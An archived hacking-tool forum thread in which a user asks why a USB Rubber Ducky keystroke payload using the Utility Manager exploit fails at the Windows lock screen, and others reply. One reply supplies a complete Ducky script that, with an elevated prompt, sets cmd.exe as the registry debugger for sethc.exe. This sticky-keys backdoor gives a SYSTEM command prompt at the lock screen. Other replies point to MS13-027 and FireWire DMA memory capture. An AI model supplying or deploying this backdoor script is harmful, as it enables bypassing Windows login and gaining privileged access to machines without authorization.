Jump to content

Archived

This topic is now archived and is closed to further replies.

Bits&Bytes

[Question] Rubber Ducky and the Windows Lock Screen

Recommended Posts

I recently purchased the Rubber Ducky (thanks HAK5, awesome tools thus far). I bought it because. I thought I could bypass the lock screen by injecting my payload (lets say ultiman exploit for ease of use) from the outside looking at a windows lock screen. I routinely find myself in need of capturing a computers RAM (passwords through Rainbow tables....malware discovery....you name it) and cannot if the lock screen is on. For those of you out there who are going to jump on this, yes I could do it through DMA and firewire (IF THEY HAVE FIREWIRE and then I would only get 4 GB of the RAM by DMA design), but I want all the RAM not just what DMA is willing to provide.

Basically, I wrote a bat file to conduct the ultiman exploit then encoded it into base64 and placed it in the inject.bin file with a vbs to revert the base64 file back into the .bat file. Then the inject.bin file would execute the .bat file. This works awesome when I plug it in with no lock screen on, however when the lock screen is activated, it never gets to open the command prompt to conduct the injection. HELP HELP HELP

I thought because Rubber Ducky would be seen as a HID device it would bypass the lock screen in windows and inject my code. Am I wrong or is this not a capability of the tool?

Share this post


Link to post
Share on other sites

I do not own a ducky... So, this is to be taken with a grain of salt; but I think if you threw it in at boot... it may take hold.

Share this post


Link to post
Share on other sites

Actually I need the RAM from the running machine so if I reboot it will preclude the need for the RAM as it will all be cleared in the reboot, but I do thank you for the response.

Share this post


Link to post
Share on other sites

USB does not support DMA (Direct Memory Access)

Firewire does have the handy module SBP2 which enables full DMA.

You could probably exploit MS13-027, but you would have to program your own payload.

Share this post


Link to post
Share on other sites

if you have done my system privileges cmd attack while the machine was unlocked then when it was locked you would have access to a command prompt with system access and im sure you could do something from there.

DELAY 400
ESCAPE
DELAY 200
CONTROL ESCAPE
DELAY 750
STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
DELAY 750
CTRL-SHIFT ENTER
DELAY 1000
ALT y
Left Alt + Left Shift + Print Screen to access the prompt.

Share this post


Link to post
Share on other sites

The rubber ducky is just a programmable keyboard device. Anything that you can't do with a keyboard, you can't do with a rubber ducky. So, in order to use the utility manager payload, you need to be at a desktop - not a lock screen or a logos prompt.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...